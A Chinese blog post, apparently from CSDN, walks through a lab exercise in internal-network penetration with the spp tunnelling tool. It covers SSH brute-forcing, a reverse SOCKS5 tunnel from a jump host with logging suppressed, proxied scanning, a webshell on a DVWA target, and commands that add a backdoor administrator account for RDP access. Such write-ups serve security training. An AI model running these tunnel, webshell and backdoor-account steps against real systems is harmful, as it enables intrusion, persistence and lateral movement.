spp内网渗透试验

已于 2024-06-13 19:32:31 修改
阅读量407 收藏 1
点赞数
分类专栏: 内网 文章标签: 网络安全 linux
于 2023-03-12 15:47:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hanjinming110/article/details/129476408
版权

试验拓扑:(说明:这个环境只是博主能够想到的一个比较简单的内网的环境,各位师傅们也可以使用别的内网环境,这个试验的目的是学会spp如何做内网穿透,环境不重要的!!!!)
在这里插入图片描述

这里补充一点,内网的机器使用机主机模式,但是这里不去勾选,这样的话内网的主机就完全与宿主机隔离在这里插入图片描述

一台kali 一台centos 一台win7

ip配置:
kali:192.168.12.20
centos:192.168.12.30    10.10.20.13    
win7:10.10.20.12  10.10.30.1

条件是:

kali能与centos的12.30这个网卡互通
centos的20.13网卡与win7的20.12网卡通
kali作为外网,centos作为内外网隔离的机器,win7完全是隔离外网,作为内网
这里我们直接使用centos作为跳板机,得到win7的服务,然后得到3389远程桌面,之后登陆,拿下内网的win7机器!

使用kali进行主机发现
在这里插入图片描述

这里发现有个30,使用nmap进行扫描
在这里插入图片描述

这里只有22端口,利用22端口进行漏洞利用,我们可以使用hydra或者msf
在这里插入图片描述

这里我们得到了账号密码,我们登陆(密码是空格,所以这里没有显示,正常情况下有密码,用字典是可以爆破出来的)
在这里插入图片描述

这里我们发现有个10.10.20.13的网络,我们可以进行内网的探测
但是这里我们需要去加入一个socks通道,所以我们使用spp这个工具或者使用frp,这里还可以使用msf。
在这里插入图片描述

通过scp命令讲这个工具传入到目标主机中

./spp -type server -proto tcp -listen :8888 --nolog 1 -noprint 1 &  在服务器端建立连接

./spp.exe -name "fxdlsocks" -type reverse_socks5_client -server 192.168.12.20:8888 -fromaddr  192.168.12.20:1080 -proxyproto tcp -proto tcp -noprint 1 -nolog 1 &  在目标主机这边使用这个,将其连接到服务器,并且在服务器的1080端口开放socks代理  --nolog是 1 是不打印日志 --noprint 1 不在终端中输出任何内容(这里可以在客户端使用,服务器端建议不要使用,可以观看流量用)

在这里插入图片描述

服务器端这里就开放了1080端口,我们这个时候就可以使用socks代理了
在这里插入图片描述

vim /etc/proxychains4.conf  在这个配置文件的末尾写入socks代理的ip地址以及端口(这里建立了socks代理以后,使用proxycvhains来进行配置,这个是kali自带的工具,windows中可以使用proxifier和sockscap64这些代理工具)

在这里插入图片描述

git clone https://github.com/zer0h/httpscan#httpscan s使用这个工具对c段就行扫描(一个c段扫描的工具,还有很多,各位大哥,可以自己去找找看)
proxychains python cscan1.py -i 10.10.20.0/24  对c段进行扫描(使用代理扫描,否则扫描不到)

经过我们进行信息收集发现,这里有一个10.10.20.11的地址
在这里插入图片描述

并且是有一个80端口的站点
那我们就使用代理去探测这个站点有什么目录

proxychains dirb http://10.10.20.11 /root/mulu.txt  使用这个文件去探测

在这里插入图片描述

有dvwa目录,我们可以去查看dvwa(这里只是展示spp工具的使用,所以这里直接使用了dvwa靶场,各位可以尝试使用其他的cms或者靶场)
在这里插入图片描述

这里使用代理打开浏览器
在这里插入图片描述

(这里爆破用户名密码,就不做展示了,跟web渗透一样,bp就可以直接拿下!)

我们传入一个一句话
在这里插入图片描述

这里我们找到路径了,我们直接使用websehll工具连接,这里我使用哥斯拉(这里同理直接使用代理打开,也可以打开以后配置代理,这里还可以使用Antsword)
在这里插入图片描述

这里成功getshell在这里插入图片描述

这里成功的拿下,发现是20.11他还有一个30网段的ip
在这里插入图片描述

这里我们使用端口扫描发现他开放有3389(各位这里也可以使用代理然后利用端口扫描的工具进行扫描也可以)
在这里插入图片描述

这里我们就可以创建一个用户,然后3389远程登陆(也可以使用ew或者lcx做一个内网端口转发)

使用net  user a 123 /add 创建一个a用户密码是123
使用net  localgroup administrators a /add 将a用户添加到管理员组中

在这里插入图片描述

使用

net user 查看到a用户

在这里插入图片描述

net  localgroup administrators   可以看到管理员组中的用户有什么,这里我们看到有a

在这里插入图片描述

使用a进行3389远程登陆拿下服务器

proxychains rdesktop 10.10.20.11 -u a -p 123

在这里插入图片描述

成功拿下我们可以去看用户权限
在这里插入图片描述

使用a用户登陆成功(这个只是博主可以想到的一种方式,各位大哥有好的思路的话可以试试)

希望对各位有所帮助!内网的一些相关的在持续更新中!

JM丫
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
工具源码.zip_c段查询_getshell_漏洞扫描_爆破_端口爆破
07-13
工具功能 1:漏洞扫描 2::0day测试 3:cms漏洞扫描 4:旁注c段查询 5:sql注入攻击 6:SQL注入检测 7:漏洞URL采集 8:CMS识别 9:Getshell自动 10:穷举爆破 11:漏洞爬行 12:安全文章对接推送 13:Struts2-045 -016 测试 14:信息收集 15:MD5解密 16:端口扫描
spp内网穿透
hanjinming110的博客
03-12 518
spp使用
内网穿透FRP&NPS&SPP&Ngrok
最新发布
qq_74806534的博客
04-05 1071
注意:这里所有的但是靶机和kali主动连接服务器跳板机,所以靶机反向连接跳板机,kali正向连接跳板机,跳板机没办法转发给kali数据,只有kali去拿数据,因为在内网环境。开通后,主要是三种协议可以选择,我们选择tcp,更加稳定,隧道名称都行,远程端口选择可用端口,本地端口选择本地kali攻击机ip端口。全面的协议支持,兼容几乎所有常用的协议,如tcp、udp、http(s)、socks5、p2p、http代理...首先是在Ngrok官网创建账号,然后实名认证,再到开通隧道下,开通免费的服务器。
【内网安全-隧道搭建】内网穿透_Spp上线(全双工通信)
wangluoanquan111的博客
03-24 812
Spp(特殊协议上线)1、简述:2、用法:1、准备2、服务器3、客户机4、cs、msf。
【内网安全】 隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目
今天是几号的博客
03-23 1308
推荐 相当于自己管理整个平台很方便nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
内网渗透—隧道搭建&SPP与NPS内网穿透
剁椒鱼头没剁椒的博客
06-15 1539
在上篇文章中已经详细的介绍了,隧道搭建与代理转发这两方面的基础知识,这里就不在赘述了,直接演示剩下的两个工具,SPP与NPS这两个工具。关于NPS方面还有很多的使用方式,建议去看看官方手册。
SPP_spp_
10-01
标题"SPP_spp_"可能指的是一个与卫星定位技术相关的项目或软件,其中"SPP"通常代表"Standard Positioning Service",即标准定位服务,这是GPS(全球定位系统)和其他GNSS(全球导航卫星系统)提供的公开可用的服务。...
spp.rar_SPP844
09-21
标题"SPP.rar_SPP844"提示我们关注的核心是SPP,这可能是指一个特定版本的软件或技术,可能是"SPP844"。描述中提到的"spiget解释器"是用来运行"spiglet程序"的,这表明SPP可能是一个编程语言或者脚本环境,而"spiget...
FeasyBlue蓝牙SPP+BLE调试助手
12-07
FeasyBlue蓝牙SPP+BLE调试助手 嵌入式BLE SPP蓝牙开发必备工具
spp.zip_in_spp
09-22
标题中的“spp.zip_in_spp”可能是指一个关于串行接口(Serial Port Parallel Protocol,SPP)的压缩包文件,其中包含了与SPP模式相关的资料。SPP是一种使用并行端口通信的方式,尽管现代计算机更倾向于使用串行接口...
spp模态分析
11-29
spp模态分析,欢迎学习comsol仿真的同学下载,,,,,
BluetoothSppPro, 蓝牙spp工具,Android项目.zip
10-10
BluetoothSppPro, 蓝牙spp工具,Android项目 你可以使用本工具作为研究之用,但不建议将其用于商业项目,如果由此引起的任何损失或法律问题与本开发者无任何关系。如果你引用了本项目中的任何文件,就默许你已接受上面的这个条款。点击查看LICENSE信息
渗透神器,非常方便的扫描器
03-20
1.5.7完美抓取baidu.google搜索结果,针对google加密url做了处理 (密码:www.3hack.com)
网络安全——C段扫描
weixin_54055099的博客
08-31 4359
C段扫描
信息收集(C段扫描)
F2444790591的博客
01-17 9820
1、收集C段内部属于目标的IP地址 2、内部服务只限IP访问,没有映射域名 3、更多的探测主机目标资产 (1)作用:快速扫描大型网络;可以获得主机运行的端口,服务,系统指纹;提供上百个扩展脚本。 (2)扫描C段主机存活 Nmap -sn -PE -n 192.168.1.1/24 -oX out.xml -sn 不扫描端口 -PE ICMP扫描
01、收集域名信息-whiso查询
qq_42053222的博客
04-14 474
信息收集需要注意的事情
代理工具SPP的使用
谢公子的博客
09-20 3086
代理工具SPP的使用
如何快速扫描C段(网站快照、后台识别/登录、目录扫描)
hacker3062的博客
09-19 425
C类地址范围从 192.0.0.1 到 223.255.255.254 ,192转换成二进制就是1100000;223转换成二进制就是1101111;所以说网络地址的最高位肯定是110开头的最高位就是前8个比特位,比如192.0.0.1最高位就是192,至于254台计算机 例如C类IP地址192.168.1.0/24 范围是从192.168.1.0-192.168.1.255 ,0是网络号不可用 255是广播地址 出去这2个 可用的就是254个地址也就是254台计算机。C段扫描的原因。
python spp
07-27
Python中的SPP是指Spatial Pyramid Pooling(空间金字塔池化),它是一种用于处理图像的技术。SPP池化可以在不同尺度上对图像进行特征提取,以适应不同尺度的目标物体。具体来说,SPP将图像分割为不同大小的网格,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

JM丫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值